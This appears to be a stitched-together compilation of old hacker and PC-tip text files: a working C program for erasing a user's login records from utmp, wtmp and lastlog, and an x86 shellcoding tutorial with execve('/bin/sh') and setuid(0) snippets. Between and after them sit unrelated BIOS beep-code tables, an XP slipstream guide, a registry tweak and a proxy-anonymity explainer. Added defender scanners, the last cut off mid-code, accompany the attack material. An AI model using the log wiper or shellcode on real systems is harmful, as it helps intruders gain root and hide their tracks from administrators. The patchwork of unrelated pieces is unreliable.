Erasing Your Presence From System Logs


Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text files that can be edited by hand with vi; they hold fixed-size binary records, so you must use a program specifically written for this purpose.

Example:

```c
/* The header names were lost in extraction; these are the standard headers
 * this program needs (string.h / strings.h added for strncmp and bzero). */
#include <sys/types.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>

#define WTMP_NAME    "/usr/adm/wtmp"
#define UTMP_NAME    "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

/* utmp: every record whose ut_name matches is overwritten in place with zeros */
void kill_utmp(who)
char *who;
{
    struct utmp utmp_ent;

    if ((f = open(UTMP_NAME, O_RDWR)) >= 0) {
        while (read(f, &utmp_ent, sizeof(utmp_ent)) > 0)
            if (!strncmp(utmp_ent.ut_name, who, strlen(who))) {
                bzero((char *)&utmp_ent, sizeof(utmp_ent));
                /* step back over the record just read and rewrite it */
                lseek(f, -(off_t)sizeof(utmp_ent), SEEK_CUR);
                write(f, &utmp_ent, sizeof(utmp_ent));
            }
        close(f);
    }
}

/* wtmp: walk backwards from the end of the file and zero only the most
 * recent record that matches */
void kill_wtmp(who)
char *who;
{
    struct utmp utmp_ent;
    long pos;

    pos = 1L;
    if ((f = open(WTMP_NAME, O_RDWR)) >= 0) {
        while (pos != -1L) {
            /* seeking before the start of the file fails: stop the walk */
            if (lseek(f, -(long)(sizeof(struct utmp) * pos), L_XTND) < 0 ||
                read(f, &utmp_ent, sizeof(struct utmp)) <= 0) {
                pos = -1L;
            } else {
                if (!strncmp(utmp_ent.ut_name, who, strlen(who))) {
                    bzero((char *)&utmp_ent, sizeof(struct utmp));
                    lseek(f, -(long)(sizeof(struct utmp) * pos), L_XTND);
                    write(f, &utmp_ent, sizeof(utmp_ent));
                    pos = -1L;
                } else
                    pos += 1L;
            }
        }
        close(f);
    }
}

/* lastlog: the file is indexed by uid, so seek to uid * sizeof(struct lastlog)
 * and write an all-zero entry there */
void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;

    if ((pwd = getpwnam(who)) != NULL) {
        if ((f = open(LASTLOG_NAME, O_RDWR)) >= 0) {
            lseek(f, (long)pwd->pw_uid * sizeof(struct lastlog), 0);
            bzero((char *)&newll, sizeof(newll));
            write(f, (char *)&newll, sizeof(newll));
            close(f);
        }
    } else
        printf("%s: ?\n", who);
}

int main(argc, argv)
int argc;
char *argv[];
{
    if (argc == 2) {
        kill_lastlog(argv[1]);
        kill_wtmp(argv[1]);
        kill_utmp(argv[1]);
        printf("Zap2!\n");
    } else
        printf("Error.\n");
    return 0;
}
```
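What this leaves behind on disk, as an added defender-side example that is not part of the original page: the program above does not remove records, it overwrites them with zero bytes, so a wiped login shows up as a record-sized run of NULs in utmp/wtmp (and as an all-zero lastlog slot for that uid). The scanner below flags such records. It assumes the 384-byte glibc struct utmp layout of Linux x86-64 (the original program targets an older BSD-style layout and file paths); the sample wtmp image is constructed inline.

```python
"""Find zeroed-out records in a utmp/wtmp image (added example, not from the page).

Assumed layout: the 384-byte little-endian struct utmp of glibc on x86-64,
with ut_type at 0, ut_pid at 4, ut_line[32] at 8, ut_user[32] at 44,
ut_host[256] at 76 and ut_tv.tv_sec at 340.
"""
import struct

RECORD_SIZE = 384                      # sizeof(struct utmp), glibc x86-64 (assumption)
USER_PROCESS, DEAD_PROCESS = 7, 8      # ut_type values from <utmp.h>


def build_record(ut_type, pid, line, user, host, tv_sec):
    """Construct one utmp record for the sample image (test data, not a real login)."""
    rec = bytearray(RECORD_SIZE)
    struct.pack_into("<hxxi", rec, 0, ut_type, pid)
    rec[8:8 + len(line)] = line.encode()
    rec[44:44 + len(user)] = user.encode()
    rec[76:76 + len(host)] = host.encode()
    struct.pack_into("<ii", rec, 340, tv_sec, 0)
    return bytes(rec)


def _cstring(buf, offset, length):
    return buf[offset:offset + length].split(b"\0", 1)[0].decode("latin-1")


def parse_record(chunk):
    """Decode the fields of one record that an investigator usually wants."""
    ut_type, pid = struct.unpack_from("<hxxi", chunk, 0)
    (tv_sec,) = struct.unpack_from("<i", chunk, 340)
    return {
        "ut_type": ut_type,
        "pid": pid,
        "line": _cstring(chunk, 8, 32),
        "user": _cstring(chunk, 44, 32),
        "host": _cstring(chunk, 76, 256),
        "time": tv_sec,
    }


def find_zeroed_records(data, record_size=RECORD_SIZE):
    """Indexes of records that are entirely NUL bytes.

    A genuine record always carries a non-zero ut_type or timestamp, so an
    all-zero record is either a wiped entry (exactly what the program above
    writes) or corruption; either way it deserves a look.
    """
    zero = bytes(record_size)
    return [
        i for i in range(len(data) // record_size)
        if data[i * record_size:(i + 1) * record_size] == zero
    ]


def scan(data, record_size=RECORD_SIZE):
    """Summarise an image: record count, wiped indexes, logins, trailing partial record."""
    records = [parse_record(data[i * record_size:(i + 1) * record_size])
               for i in range(len(data) // record_size)]
    return {
        "records": len(records),
        "wiped": find_zeroed_records(data, record_size),
        "logins": [r["user"] for r in records if r["ut_type"] == USER_PROCESS],
        "truncated_bytes": len(data) % record_size,
    }


# Constructed sample: two logins and one logout, then the same image with the
# second login overwritten by zeros the way the program above does it.
SAMPLE_WTMP = b"".join([
    build_record(USER_PROCESS, 1201, "pts/0", "alice", "10.0.0.5", 1_700_000_000),
    build_record(USER_PROCESS, 1305, "pts/1", "bob", "10.0.0.9", 1_700_000_100),
    build_record(DEAD_PROCESS, 1201, "pts/0", "", "", 1_700_000_200),
])
WIPED_WTMP = SAMPLE_WTMP[:RECORD_SIZE] + bytes(RECORD_SIZE) + SAMPLE_WTMP[2 * RECORD_SIZE:]

if __name__ == "__main__":
    for name, image in (("clean", SAMPLE_WTMP), ("wiped", WIPED_WTMP)):
        print(name, scan(image))
```

Run it on a live system with `scan(open("/var/log/wtmp", "rb").read())`; any index in `wiped` or a non-zero `truncated_bytes` is worth correlating with the authentication log, which the program above does not touch. The same check applies to lastlog: on glibc an entry is 292 bytes, so an all-zero slot at uid * 292 for a user who does have wtmp logins is the matching artifact.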

Beep Codes Error Codes


Standard Original IBM POST Error Codes

Code Description

1 short beep System is OK
2 short beeps POST Error - error code shown on screen
No beep Power supply or system board problem
Continuous beep Power supply, system board, or keyboard problem
Repeating short beeps Power supply or system board problem
1 long, 1 short beep System board problem
1 long, 2 short beeps Display adapter problem (MDA, CGA)
1 long, 3 short beeps Display adapter problem (EGA)
3 long beeps 3270 keyboard card
IBM POST Diagnostic Code Descriptions
Code Description
100 - 199 System Board
200 - 299 Memory
300 - 399 Keyboard
400 - 499 Monochrome Display
500 - 599 Colour/Graphics Display
600 - 699 Floppy-disk drive and/or Adapter
700 - 799 Math Coprocessor
900 - 999 Parallel Printer Port
1000 - 1099 Alternate Printer Adapter
1100 - 1299 Asynchronous Communication Device, Adapter, or Port
1300 - 1399 Game Port
1400 - 1499 Colour/Graphics Printer
1500 - 1599 Synchronous Communication Device, Adapter, or Port
1700 - 1799 Hard Drive and/or Adapter
1800 - 1899 Expansion Unit (XT)
2000 - 2199 Bisynchronous Communication Adapter
2400 - 2599 EGA system-board Video (MCA)
3000 - 3199 LAN Adapter
4800 - 4999 Internal Modem
7000 - 7099 Phoenix BIOS Chips
7300 - 7399 3.5″ Disk Drive
8900 - 8999 MIDI Adapter
11200 - 11299 SCSI Adapter
21000 - 21099 SCSI Fixed Disk and Controller
21500 - 21599 SCSI CD-ROM System

AMI BIOS Beep Codes

Code Description

1 Short Beep System OK
2 Short Beeps Parity error in the first 64 KB of memory
3 Short Beeps Memory failure in the first 64 KB
4 Short Beeps Memory failure in the first 64 KB, or Timer 1 on the motherboard is not functioning
5 Short Beeps The CPU on the motherboard generated an error
6 Short Beeps The keyboard controller may be bad. The BIOS cannot switch to protected mode
7 Short Beeps The CPU generated an exception interrupt
8 Short Beeps The system video adapter is either missing, or its memory is faulty
9 Short Beeps The ROM checksum value does not match the value encoded in the BIOS
10 Short Beeps The shutdown register for CMOS RAM failed
11 Short Beeps The external cache is faulty
1 Long, 3 Short Beeps Memory Problems
1 Long, 8 Short Beeps Video Card Problems

Phoenix BIOS Beep Codes

Note - Phoenix BIOS emits three sets of beeps, separated by a brief pause.

Code Description
1-1-3 CMOS read/write failure
1-1-4 ROM BIOS checksum error
1-2-1 Programmable interval timer failure
1-2-2 DMA initialisation failure
1-2-3 DMA page register read/write failure
1-3-1 RAM refresh verification failure
1-3-3 First 64k RAM chip or data line failure
1-3-4 First 64k RAM odd/even logic failure
1-4-1 Address line failure first 64k RAM
1-4-2 Parity failure first 64k RAM
2-_-_ Faulty Memory
3-1-_ Faulty Motherboard
3-2-4 Keyboard controller Test failure
3-3-4 Screen initialisation failure
3-4-1 Screen retrace test failure
3-4-2 Search for video ROM in progress
4-2-1 Timer tick interrupt in progress or failure
4-2-2 Shutdown test in progress or failure
4-2-3 Gate A20 failure
4-2-4 Unexpected interrupt in protected mode
4-3-1 RAM test in progress or failure>ffffh
4-3-2 Faulty Motherboard
4-3-3 Interval timer channel 2 test or failure
4-3-4 Time of Day clock test failure
4-4-1 Serial port test or failure
4-4-2 Parallel port test or failure
4-4-3 Math coprocessor test or failure
Low 1-1-2 System Board select failure
Low 1-1-3 Extended CMOS RAM failure

Beep Code Manual


BIOS Beep Codes

When a computer is first turned on, or rebooted, its BIOS performs a power-on self test (POST) to test the system’s hardware, checking to make sure that all of the system’s hardware components are working properly. Under normal circumstances, the POST will display an error message; however, if the BIOS detects an error before it can access the video card, or if there is a problem with the video card, it will produce a series of beeps, and the pattern of the beeps indicates what kind of problem the BIOS has detected.
Because there are many brands of BIOS, there are no standard beep codes for every BIOS.

The two most-used brands are AMI (American Megatrends International) and Phoenix.

Below are listed the beep codes for AMI systems, followed by the beep codes for Phoenix systems.

AMI Beep Codes

Beep Code Meaning
1 beep DRAM refresh failure. There is a problem in the system memory or the motherboard.
2 beeps Memory parity error. The parity circuit is not working properly.
3 beeps Base 64K RAM failure. There is a problem with the first 64K of system memory.
4 beeps System timer not operational. There is problem with the timer(s) that control functions on the motherboard.
5 beeps Processor failure. The system CPU has failed.
6 beeps Gate A20/keyboard controller failure. The keyboard IC controller has failed, preventing gate A20 from switching the processor to protect mode.
7 beeps Virtual mode exception error.
8 beeps Video memory error. The BIOS cannot write to the frame buffer memory on the video card.
9 beeps ROM checksum error. The BIOS ROM chip on the motherboard is likely faulty.
10 beeps CMOS checksum error. Something on the motherboard is causing an error when trying to interact with the CMOS.
11 beeps Bad cache memory. An error in the level 2 cache memory.
1 long beep, 2 short Failure in the video system.
1 long beep, 3 short A failure has been detected in memory above 64K.
1 long beep, 8 short Display test failure.
Continuous beeping A problem with the memory or video.

Phoenix Beep Codes

Phoenix uses sequences of beeps to indicate problems. The "-" between each number below indicates a pause between each beep sequence. For example, 1-2-3 indicates one beep, followed by a pause and two beeps, followed by a pause and three beeps. Phoenix versions before 4.x use 3-beep codes, while Phoenix versions starting with 4.x use 4-beep codes.
4-Beep Codes
Beep Code Meaning
1-1-1-3 Faulty CPU/motherboard. Verify real mode.
1-1-2-1 Faulty CPU/motherboard.
1-1-2-3 Faulty motherboard or one of its components.
1-1-3-1 Faulty motherboard or one of its components. Initialize chipset registers with initial POST values.
1-1-3-2 Faulty motherboard or one of its components.
1-1-3-3 Faulty motherboard or one of its components. Initialize CPU registers.
1-1-3-4 Failure in the first 64K of memory.
1-1-4-1 Level 2 cache error.
1-1-4-3 I/O port error.
1-2-1-1 Power management error.
1-2-1-2
1-2-1-3 Faulty motherboard or one of its components.
1-2-2-1 Keyboard controller failure.
1-2-2-3 BIOS ROM error.
1-2-3-1 System timer error.
1-2-3-3 DMA error.
1-2-4-1 IRQ controller error.
1-3-1-1 DRAM refresh error.
1-3-1-3 A20 gate failure.
1-3-2-1 Faulty motherboard or one of its components.
1-3-3-1 Extended memory error.
1-3-3-3
1-3-4-1
1-3-4-3 Error in first 1MB of system memory.
1-4-1-3
1-4-2-4 CPU error.
1-4-3-1
2-1-4-1 BIOS ROM shadow error.
1-4-3-2
1-4-3-3 Level 2 cache error.
1-4-4-1
1-4-4-2
2-1-1-1 Faulty motherboard or one of its components.
2-1-1-3
2-1-2-1 IRQ failure.
2-1-2-3 BIOS ROM error.
2-1-2-4 I/O port failure.
2-1-3-1
2-1-3-2 I/O port failure.
2-1-3-3 Video system failure.
2-1-4-3
2-2-1-1 Video card failure.
2-2-1-3
2-2-2-1
2-2-2-3 Keyboard controller failure.
2-2-3-1 IRQ error.
2-2-4-1 Error in first 1MB of system memory.
2-3-1-1
2-3-3-3 Extended memory failure.
2-3-2-1 Faulty motherboard or one of its components.
2-3-2-3
2-3-3-1 Level 2 cache error.
2-3-4-1
2-3-4-3 Motherboard or video card failure.
2-4-1-1 Motherboard or video card failure.
2-4-1-3 Faulty motherboard or one of its components.
2-4-2-1 RTC error.
2-4-2-3 Keyboard controller error.
2-4-4-1 IRQ error.
3-1-1-1
3-1-1-3
3-1-2-1
3-1-2-3 I/O port error.
3-1-3-1
3-1-3-3 Faulty motherboard or one of its components.
3-1-4-1
3-2-1-1
3-2-1-2 Floppy drive or hard drive failure.
3-2-1-3 Faulty motherboard or one of its components.
3-2-2-1 Keyboard controller error.
3-2-2-3
3-2-3-1
3-2-4-1 Faulty motherboard or one of its components.
3-2-4-3 IRQ error.
3-3-1-1 RTC error.
3-3-1-3 Key lock error.
3-3-3-3 Faulty motherboard or one of its components.
3-3-4-1
3-3-4-3
3-4-1-1
3-4-1-3
3-4-2-1
3-4-2-3
3-4-3-1
3-4-4-1
3-4-4-4 Faulty motherboard or one of its components.
4-1-1-1 Floppy drive or hard drive failure.
4-2-1-1
4-2-1-3
4-2-2-1 IRQ failure.
4-2-2-3
4-2-3-1
4-2-3-3
4-2-4-1 Faulty motherboard or one of its components.
4-2-4-3 Keyboard controller error.
4-3-1-3
4-3-1-4
4-3-2-1
4-3-2-2
4-3-3-1
4-3-4-1
4-3-4-3 Faulty motherboard or one of its components.
4-3-3-2
4-3-3-4 IRQ failure.
4-3-3-3
4-3-4-2 Floppy drive or hard drive failure.
3-Beep Codes
Beep Code Meaning
1-1-2 Faulty CPU/motherboard.
1-1-3 Faulty motherboard/CMOS read-write failure.
1-1-4 Faulty BIOS/BIOS ROM checksum error.
1-2-1 System timer not operational. There is a problem with the timer(s) that control functions on the motherboard.
1-2-2
1-2-3 Faulty motherboard/DMA failure.
1-3-1 Memory refresh failure.
1-3-2
1-3-3
1-3-4 Failure in the first 64K of memory.
1-4-1 Address line failure.
1-4-2 Parity RAM failure.
1-4-3 Timer failure.
1-4-4 NMI port failure.
2-_-_ Any combination of beeps after 2 indicates a failure in the first 64K of memory.
3-1-1 Master DMA failure.
3-1-2 Slave DMA failure.
3-1-3
3-1-4 Interrupt controller failure.
3-2-4 Keyboard controller failure.
3-3-1
3-3-2 CMOS error.
3-3-4 Video card failure.
3-4-1 Video card failure.
4-2-1 Timer failure.
4-2-2 CMOS shutdown failure.
4-2-3 Gate A20 failure.
4-2-4 Unexpected interrupt in protected mode.
4-3-1 RAM test failure.
4-3-3 Timer failure.
4-3-4 Time of day clock failure.
4-4-1 Serial port failure.
4-4-2 Parallel port failure.
4-4-3 Math coprocessor.

Create Bootable XP SP integrated CD


Slipstreaming Windows XP Service Pack 1a and Create Bootable CD

Slipstreaming a Service Pack is the process of integrating the Service Pack into the installation files, so that every new installation installs the operating system and the Service Pack at the same time.

Slipstreaming is usually done on network shares on corporate systems. But with the advent of CD burners, it does actually make some sense for the home user or small business user to do the same.

Microsoft added the ability to Slipstream a Service Pack to Windows 2000 and Windows XP. It not only has the advantage that when you (re)install your OS, you don’t have to apply the Service Pack later, also if you update any Windows component later, you’ll be sure that you get the correct installation files if Windows needs any.

Slipstream Windows XP Service Pack 1a:
Download: http://download.microsoft.com/download/5/4/f/54f8bcf8-bb4d-4613-8ee7-db69d01735ed/xpsp1a_en_x86.exe

Download the (full) “Network Install” of the Service Pack (English version [125 MB]), and save it to a directory (folder) on your hard drive (in my case D:\XP-SP1). Other languages can be downloaded from the Windows XP Web site.

Microsoft recently released Windows XP SP1a. The only difference is that this Service Pack no longer includes Microsoft's dated Java version. If you have already installed Windows XP SP1, there is no reason to install SP1a, but the "older" SP1 (with MS Java) is no longer available for download.

Next copy your Windows XP CD to your hard drive. Just create a folder (I used \XP-CD), and copy all the contents of your Windows XP CD in that folder.

Now create a folder to hold the Service Pack 1a (SP1a) files you are about to extract. I named it \XP-SP1. Next, open a Command Prompt (Start > Run > cmd), and go to the folder where you downloaded SP1a (cd \foldername). Type the command <service pack filename> -x (with the file downloaded above: xpsp1a_en_x86.exe -x). A small window will appear, and you need to point it to the folder where you want to extract the SP1a files. Click Ok to start extracting the SP1a files.

Once the SP1a files are extracted, change to the update folder of the SP1a files (cd update), and type the following command: update /s:<path to WinXP CD files>. In my example the command is update /s:D:\XP-CD.

Windows XP Update will do its thing:

When ready, you should get a confirmation. Windows XP Service Pack 1a has now been Slipstreamed into your original Windows XP files.

It is also possible to add the Windows XP Rollup 1 Update. For instructions, please read Adding Windows XP Rollup 1 Hotfix.

Creating a Bootable CD
For this part I used ISO Buster (http://www.smart-projects.net/isobuster/) and Nero Burning ROM.

Start to extract the boot loader from the original Windows XP CD. Using ISO Buster, select the “folder” Bootable CD, and right-click Microsoft Corporation.img. From the menu choose Extract Microsoft Corporation.img, and extract it to the folder on your hard drive where you have your Windows XP files (D:\XP-CD in my case).

Next, start Nero Burning ROM, and choose CD-ROM (Boot) in the New Compilation window. On the Boot tab, select Image file under Source of boot image data, and browse to the location of the Microsoft Corporation.img file. Also enable Expert Settings, choosing No Emulation, and changing the Number of loaded sectors to 4 (otherwise it won't boot!).

If you have an older version of Nero you won't have the option Do Not Add ";1" ISO file version extension under Relax ISO Restrictions. Without it you won't be able to boot your new CD, so update Nero!
You can configure the Label tab to your liking; I would however recommend that you keep the Volume Label the same as on your original Windows XP CD.

Next press New, and drag & drop the files and folders from your Windows XP hard drive location into Nero.

Next, burn your new CD.

You now have a Bootable, Slipstreamed Windows XP Service Pack 1a CD!

Auto End Tasks to Enable a Proper Shutdown


This reg file automatically ends tasks and timeouts that prevent programs from shutting down and clears the Paging File on Exit.

1. Copy the following (everything in the box) into notepad.

```reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management]
"ClearPageFileAtShutdown"=dword:00000001

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"AutoEndTasks"="1"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control]
"WaitToKillServiceTimeout"="1000"
```

2. Save the file as shutdown.reg

3. Double click the file to import into your registry.

NOTE: If your anti-virus software warns you of a “malicious” script, this is normal if you have “Script Safe” or similar technology enabled.

Advanced Shellcoding Techniques


Introduction

This post assumes a working knowledge of basic shellcoding techniques and x86 assembly; I will not rehash these in this paper. I hope to teach you some of the lesser known shellcoding techniques that I have picked up, which will allow you to write smaller and better shellcodes. I do not claim to have invented any of these techniques, except for the one that uses the div instruction.

The multiplicity of mul

This technique was originally developed by Sorbo of darkircop.net. The mul instruction may, on the surface, seem mundane, and its purpose obvious. However, when faced with the difficult challenge of shrinking your shellcode, it proves to be quite useful. First some background information on the mul instruction itself.

mul performs an unsigned multiply of two integers. It takes only one operand; the other is implicitly specified by the %eax register. So, a common mul instruction might look something like this:

```asm
movl $0x0a,%eax
movl $0x0a,%ebx   # mul has no immediate form; the multiplier goes in a register
mul %ebx
```

This would multiply the value stored in %eax by the operand of mul, which in this case would be 10*10. The result is then implicitly stored in EDX:EAX. The result is stored over a span of two registers because it has the potential to be considerably larger than the previous value, possibly exceeding the capacity of a single register (this is also how floating points are stored in some cases, as an interesting side note).

So, now comes the ever-important question: how can we use these attributes to our advantage when writing shellcode? Well, let's think for a second. The instruction takes only one operand, so, since it is a very common instruction, it will generate only two bytes in our final shellcode. It multiplies whatever is passed to it by the value stored in %eax, and stores the result in both %edx and %eax, completely overwriting the contents of both registers, regardless of whether it is necessary to do so in order to store the result of the multiplication. Let's put on our mathematician hats for a second and consider this: what is the only possible result of a multiplication by 0? The answer, as you may have guessed, is 0. I think it's about time for some example code, so here it is:

```asm
xorl %ecx,%ecx
mul %ecx
```

What is this shellcode doing? Well, it zeroes out the %ecx register using the xor instruction, so we now know that %ecx is 0. Then it does a mul %ecx, which, as we just learned, multiplies its operand by the value in %eax, and then proceeds to store the result of this multiplication in EDX:EAX. So, regardless of %eax's previous contents, %eax must now be 0. However, that's not all: %edx is zeroed now too, because, even though no overflow occurs, it still overwrites the %edx register with the sign bit (left-most bit) of %eax. Using this technique we can zero out three registers in only three bytes, whereas by any other method (that I know of) it would have taken at least six.

The div instruction

Div is very similar to mul, in that it takes only one operand and implicitly divides the operand by the value in %eax. Also like mul, it stores the result of the divide in %eax. Again, we will require the mathematical side of our brains to figure out how we can take advantage of this instruction. But first, let's think about what is normally stored in the %eax register. The %eax register holds the return value of functions and/or syscalls. Most syscalls that are used in shellcoding will return -1 (on failure) or a positive value of some kind; only rarely will they return 0 (though it does occur). So, if we know that after a syscall is performed %eax will have a non-zero value, and that the instruction divl %eax will divide %eax by itself and then store the result in %eax, we can say that executing the divl %eax instruction after a syscall will put the value 1 into %eax. So, how is this applicable to shellcoding? Well, there is another important thing that %eax is used for, and that is to pass the number of the syscall that you would like to call to int $0x80. It just so happens that the syscall that corresponds to the value 1 is exit(). Now for an example:

```asm
orl %ebx,%ebx
mul %ebx
push %edx
pushl   $0x3268732f
pushl   $0x6e69622f
mov %esp, %ebx
push %edx
push %ebx
mov %esp,%ecx
movb $0xb, %al  # execve() syscall, doesn't return at all unless it fails, in which case it returns -1
int $0x80

divl %eax  # -1 / -1 = 1
int $0x80
```

Now we have a 3-byte exit function, whereas before it was 5 bytes. However, there is a catch: what if a syscall does return 0? Well, in the odd situation in which that could happen, you could do many different things, like inc %eax, dec %eax, not %eax, anything that will make %eax non-zero. Some people say that exits are not important in shellcode, because your code gets executed regardless of whether or not it exits cleanly. They are right too; if you really need to save 3 bytes to fit your shellcode in somewhere, the exit() isn't worth keeping. However, when your code does finish, it will try to execute whatever was after your last instruction, which will most likely produce a SIGILL (illegal instruction), which is a rather odd error and will be logged by the system. So an exit() simply adds an extra layer of stealth to your exploit, so that even if it fails or you can't wipe all the logs, at least this part of your presence will be clear.

Unlocking the power of leal

The leal instruction is an often neglected instruction in shellcode, even though it is quite useful.  Consider this short piece of shellcode.

```asm
xorl %ecx,%ecx
leal 0x10(%ecx),%eax
```

This will load the value 17 into eax, and clear all of the extraneous bits of eax. This occurs because the leal instruction loads a variable of the type long into its destination operand. In its normal usage, this would load the address of a variable into a register, thus creating a pointer of sorts. However, since ecx is zeroed and 0+17=17, we load the value 17 into eax instead of any kind of actual address. In a normal shellcode we would do something like this to accomplish the same thing:

```asm
xorl %eax,%eax
movb $0x10,%al    # movb needs the 8-bit register; %eax is not a valid destination
```

I can hear you saying, "but that shellcode is a byte shorter than the leal one", and you're quite right. However, in a real shellcode you may already have to zero out a register like ecx (or any other register), so the xorl instruction in the leal shellcode isn't counted. Here's an example:

```asm
xorl    %eax,%eax
xorl    %ebx,%ebx
movb    $0x17,%al
int     $0x80
```

```asm
xorl %ebx,%ebx
leal 0x17(%ebx),%eax   # lea needs a 32-bit destination; %al is not valid here
int $0x80
```

Both of these shellcodes call setuid(0), but one does it in 7 bytes while the other does it in 8. Again, I hear you saying "but that's only one byte, it doesn't make that much of a difference", and you're right: here it doesn't make much of a difference (except in shellcode-size pissing contests =p), but when applied to much larger shellcodes, which have many function calls and need to do things like this frequently, it can save quite a bit of space.

Conclusion

I hope you all learned something, and will go out and apply your knowledge to create smaller and better shellcodes.  If you know who invented  the leal technique, please tell me and I will credit him/her.

Anonymity of Proxy


Information on the Internet is exchanged according to the client-server model. A client sends a request (which files it needs) and the server sends a reply (the requested files). So that the two can cooperate closely, the client also sends information about itself: the name and version of its operating system, the configuration of its browser (including its name and version), and so on. The server may need this in order to decide which version of a web page to serve, since different variants of a page exist for different browser configurations. However, since web pages do not usually depend on the browser, it makes sense to hide this information from the web server.

What your browser transmits to a web server:
the name and version of the operating system
the name and version of the browser
the browser's configuration (display resolution, colour depth, Java / JavaScript support, ...)
the client's IP address
other information

The most important part of this information (and quite unnecessary for a web server) is the IP address. From your IP it is possible to learn the following about you:
the country you are in
the city
your provider's name and e-mail address
your physical address

The information a client transmits to a server is available to the server as environment variables. Each item of information is the value of some variable. If an item is not transmitted, the corresponding variable is empty (its value is undefined).

These are some of the environment variables:

REMOTE_ADDR - the IP address of the client

HTTP_VIA - if it is not empty, a proxy is in use. Its value is the address (or several addresses) of the proxy server; this variable is added by the proxy server itself if you use one.

HTTP_X_FORWARDED_FOR - if it is not empty, a proxy is in use. Its value is the real IP address of the client (your IP); this variable is also added by the proxy server if you use one.

HTTP_ACCEPT_LANGUAGE - the language used in the browser (the language a page should be displayed in)

HTTP_USER_AGENT - the so-called "user agent". For all browsers this begins with Mozilla. The browser's name and version (e.g. MSIE 5.5) and the operating system (e.g. Windows 98) are also given here.

HTTP_HOST - the web server's name

This is only a small part of the environment variables. In fact there are many more (DOCUMENT_ROOT, HTTP_ACCEPT_ENCODING, HTTP_CACHE_CONTROL, HTTP_CONNECTION, SERVER_ADDR, SERVER_SOFTWARE, SERVER_PROTOCOL, ...). How many there are depends on the settings of both the server and the client.

These are examples of variable values:

REMOTE_ADDR = 194.85.1.1
HTTP_ACCEPT_LANGUAGE = ru
HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
HTTP_HOST = www.webserver.ru
HTTP_VIA = 194.85.1.1 (Squid/2.4.STABLE7)
HTTP_X_FORWARDED_FOR = 194.115.5.5

Your anonymity on the Internet is determined by which environment variables are "hidden" from the web server.

If no proxy server is used, the environment variables look like this:

REMOTE_ADDR = your IP
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined

According to how a proxy server "hides" the environment variables, there are several types of proxies.
Transparent Proxies

They do not hide information about your IP address:

REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = your IP

The purpose of such proxy servers is not to improve your anonymity on the Internet. They exist for caching, for sharing one Internet connection among several computers, and so on.
Anonymous Proxies

All proxy servers that hide a client's IP address in some way are called anonymous proxies.

Simple Anonymous Proxies

These proxy servers do not hide the fact that a proxy is used, but they replace your IP with their own:
REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = proxy IP

These are the most widespread of the anonymous proxy servers.

Distorting Proxies

Like simple anonymous proxies, these proxies do not hide the fact that a proxy server is used. However, the client's IP address (your IP address) is replaced with a different (arbitrary, random) IP:

REMOTE_ADDR = proxy IP
HTTP_VIA = proxy IP
HTTP_X_FORWARDED_FOR = random IP address
High Anonymity Proxies

These proxy servers are also called "high anonymity proxies". Unlike the other types of anonymous proxy, they hide the fact that a proxy is used at all:

REMOTE_ADDR = proxy IP
HTTP_VIA = not determined
HTTP_X_FORWARDED_FOR = not determined

That means the variables have the same values as if no proxy were used, with one very important exception: the proxy's IP appears instead of your own.
Summary

Depending on their purpose, there are transparent and anonymous proxies. But remember: a proxy server hides only your IP from the web server; the other information (about your browser configuration) remains accessible!
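A server-side classifier for the proxy classes described above, as an added example that is not from the original text. It works from the same three variables (REMOTE_ADDR, HTTP_VIA, HTTP_X_FORWARDED_FOR); because the server cannot tell whether a forwarded address is the client's real one or a fabricated one, transparent and distorting proxies fall into a single class, and a forwarded address from a private range is called out separately. The second function shows the rule a defender actually needs: honour X-Forwarded-For only when the request arrives from a proxy you operate (`trusted_proxies`, a set of address strings, is an assumption of this example). The sample variable sets are constructed; the first reuses the values shown in the text.

```python
"""Classify proxy use from the three CGI variables the text describes
(added example, not from the original page)."""
import ipaddress


def _first_ip(value):
    """X-Forwarded-For may carry a comma-separated chain; the left-most entry
    is the claimed client. Anything that is not an IP literal counts as absent."""
    for part in value.split(","):
        part = part.strip()
        if part:
            try:
                return ipaddress.ip_address(part)
            except ValueError:
                return None
    return None


def classify_request(env):
    """Return the proxy class as seen by the server, plus the addresses involved."""
    remote = ipaddress.ip_address(env["REMOTE_ADDR"])     # always set by the server itself
    via = env.get("HTTP_VIA", "").strip()
    xff = env.get("HTTP_X_FORWARDED_FOR", "").strip()
    claimed = _first_ip(xff) if xff else None

    if not via and not xff:
        kind = "direct-or-high-anonymity"    # nothing distinguishes the two server-side
    elif claimed is None:
        kind = "anonymous-no-client-ip"      # proxy announced itself, no usable client IP
    elif claimed == remote:
        kind = "simple-anonymous"            # proxy substituted its own address
    elif not claimed.is_global:
        kind = "distorting-or-internal"      # private/loopback address cannot be a public client
    else:
        kind = "transparent-or-distorting"   # looks like a client address, but unverifiable
    return {
        "kind": kind,
        "remote_addr": str(remote),
        "claimed_client": str(claimed) if claimed is not None else None,
        "via": via or None,
    }


def effective_client_ip(env, trusted_proxies):
    """Defender's rule: use X-Forwarded-For only when REMOTE_ADDR is a proxy we run.
    Otherwise any peer could set the header and pick its own apparent address."""
    remote = env["REMOTE_ADDR"]
    if remote in trusted_proxies:
        claimed = _first_ip(env.get("HTTP_X_FORWARDED_FOR", ""))
        if claimed is not None:
            return str(claimed)
    return remote


# Constructed samples; the first reuses the variable values given in the text.
PAGE_EXAMPLE = {
    "REMOTE_ADDR": "194.85.1.1",
    "HTTP_VIA": "194.85.1.1 (Squid/2.4.STABLE7)",
    "HTTP_X_FORWARDED_FOR": "194.115.5.5",
}
SIMPLE_ANON = {"REMOTE_ADDR": "194.85.1.1", "HTTP_VIA": "194.85.1.1",
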